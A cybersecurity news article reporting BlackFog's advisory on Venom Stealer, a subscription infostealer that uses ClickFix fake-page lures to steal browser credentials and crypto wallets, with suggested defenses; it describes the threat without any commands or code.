A new malware-as-a-service (MaaS) platform dubbed Venom Stealer that automates credential theft and continuous data exfiltration has been identified by cybersecurity researchers.

The platform is being sold on cybercrime networks and is designed to go beyond traditional credential harvesting tools by maintaining ongoing access to stolen data even after the initial infection.

Integrating ClickFix Into Venom Stealer

According to a new advisory published by BlackFog researchers on March 31, Venom Stealer includes the integration of ClickFix social engineering directly into its operator panel, allowing attackers to automate the entire attack chain from infection to data theft.

The platform operates on a subscription model ranging from $250 per month to $1,800 for lifetime access, and includes Telegram-based licensing and an affiliate program.

The infection process begins when a victim lands on a fake webpage, such as a Cloudflare CAPTCHA, an OS update prompt, an SSL certificate error or a font installation page. Victims are instructed to open a Run dialog or Terminal, paste a command and execute it themselves, which makes the activity appear user-initiated and helps bypass detection systems.

Once executed, the malware extracts saved passwords, session cookies, browsing history, autofill data and cryptocurrency wallet information from Chromium and Firefox-based browsers. The malware also performs system fingerprinting and collects browser extension data, creating a detailed profile of the infected system.

Read more on social engineering attacks: Anatomy of a Service Desk Social Engineering Attack

Continuous Exfiltration and Crypto Theft

Unlike traditional infostealers that run once and exit, Venom Stealer remains active and continuously monitors Chrome's login database to capture newly saved credentials in real time. This makes credential rotation less effective as a response strategy and extends the period during which data can be stolen.

If cryptocurrency wallets are found, the data is sent to a server-side cracking engine running on GPU infrastructure. Once cracked, funds are automatically transferred across multiple blockchain networks, including tokens and decentralized finance positions.

Key capabilities of the malware include:

• Automated ClickFix delivery templates for Windows and macOS

• Continuous credential monitoring after infection

• Cryptocurrency wallet cracking and automatic fund transfers

• File system search for seed phrases and password files

BlackFog said the attack chain can be disrupted by restricting PowerShell execution, disabling the Run dialog for standard users and training employees to recognize ClickFix-style social engineering attempts. Monitoring outbound network traffic is also important, as the malware relies on immediate data exfiltration to attacker-controlled servers.

The research indicated that the platform is actively maintained, with multiple updates released in March 2026, suggesting a full-time development operation.